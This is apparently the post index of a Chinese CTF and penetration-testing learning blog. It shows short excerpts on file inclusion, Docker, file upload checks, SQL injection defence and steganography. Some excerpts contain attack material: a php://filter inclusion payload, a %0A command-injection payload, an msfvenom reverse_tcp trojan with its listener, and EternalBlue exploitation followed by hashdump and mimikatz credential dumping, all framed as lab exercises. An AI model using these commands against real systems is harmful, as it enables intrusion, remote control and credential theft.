iloveflag-blog

iloveflag-blog

iloveflag

南邮ctf
filter-文件包含例题:http://4.chinalover.sinaapp.com/web7/index.php 参考:https://blog.csdn.net/qq_35544379/article/details/78230629 发现有一个get file的的文件包含,但是要如何获取flag呢?一直想不通 悄咪咪地搜索了下write up payload为http://4.chinalover.sinaapp.com/web7/index.php?file=php://filter/read=convert.base64-encode/resource=index.php...
Docker的大坑记录
本来出道web题投稿到安恒的,安恒要写Dockerfile,怕是在为难我胖虎!! 好了,速学了一下docker,请教了docker忘的差不多的云计算选手 我的天,到最后还是一大堆bug 也就是搭建一个centos的环境,要有apache和php就行 没找到用centos镜像再去装apache和php的,找到了也是一堆bug,就拉了一个现成的 FROM naqoda/centos-apache-phpCOPY html/index.php /var/www/app/public_html/RUN echo “ServerName localhost:80” >...
requests进行文件上传
1234567891011121314151617181920212223242526272829303132333435363738394041424344<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title></title></head><body><form method="POST" enctype="multipart/form-d...
浅谈文件上传的后缀检测
这是油管上的代码,我在思考这种判别后缀的方式有没有漏洞,第一时间想到的是%00截断,但是实验后发现比如1.php%00.jpg,%00后面的已经过滤了,然后.号分隔取最后,无法绕过,我在freebuf上也看到这个白名单检测的问题(http://www.freebuf.com/vuls/128846.html)在分隔成数组之前已经是php后缀了当然往跟深处讲,如果网站有文件包含漏洞的话,将一句话木马变成png上传成功后,再利用文件包含,也是可行的方法!dvwa的后缀检测:更多白名单的后缀检测:(https://www.jb51.net/article/81320.htm)
sql注入与防御1(mysqli_real_escape_string)
sql注入一种常见的网络攻击手段,以前没学php的时候只会一点mysql的语言,万能密码啥的绕过,防御只了解过pdo,手工注入更是弱爆,直接sqlmap注入,现在学了php后,有了一个全新的认识 油管大佬介绍了利用mysqli_real_escape_string这个函数来防御SQL注入:(https://youtu.be/nTgFPcYRkys) 函数介绍:(http://www.w3school.com.cn/php/func_mysql_real_escape_string.asp) 于是我专门实验了万能密码的绕过 先在我的数据库创建一张表:   撸上我的代码: 看...
2018安恒杯7月
misc1F5算法:https://github.com/matthewgao/F5-steganography java Extract Misc.jpg zip伪加密1->0 mis2注释得到摩斯密码解密(为压缩包密码) lsb隐写:https://github.com/livz/cloacked-pixel python lsb.py extract (python2环境) web3:web3原理:http://www.freebuf.com/articles/web/35353.html swf zws头部解析:https://blog.csdn.net/Hundred...
远程命令注入
ctf里某群友发的题:http://45.124.115.155:8003/a74a15c5fb626077/** ls cat 啥的都被过滤了(http://45.124.115.155:8003/a74a15c5fb626077/ping.php?ip=127.0.0.1%0Amore%20ping.php): PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.086 ms --- 127.0.0.1 ping statistics -...
kali获取持续性后门shell
win7靶机:192.168.1.38 kali:192.168.1.35 上一篇讲到通过ms17_010获取了shell,如果对方没有这个漏洞可以利用呢?换一种社会工程学的思路: msfvenom -p windows/meterpreter/resverse_tcp lhost=192.168.1.35 lport=4444 -f exe -o /hack.exe 生成木马 将exe文件发送给靶机 use exploit/multi/handle set payload windows/meterpreter/resverse_tcp set lhost 192.168.1.3...
ms17_010和ms08-067实验笔记
win7靶机:192.168.1.38(所有实验均在虚拟机上完成,切勿用于非法用途) kali:192.168.1.35 use exploit/windows/smb/ms17_010_eternalblueset payload windows/meterpreter/reverse_tcp 查看下options 返回shell后:hashdump load mimikatz 运行命令msv,导出hash msv 然后执行kerberos即可获得目标机账号密码 kerberos 使用端口转发工具,将端口转发到访问者本地机器的某个端口,从而进行连接运行命令 portfwd...
javascript实现图片变换
12345678910111213141516171819202122232425<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Document</title></head><body><img src="hack.jpg" id="image"><script>var test=document.getE...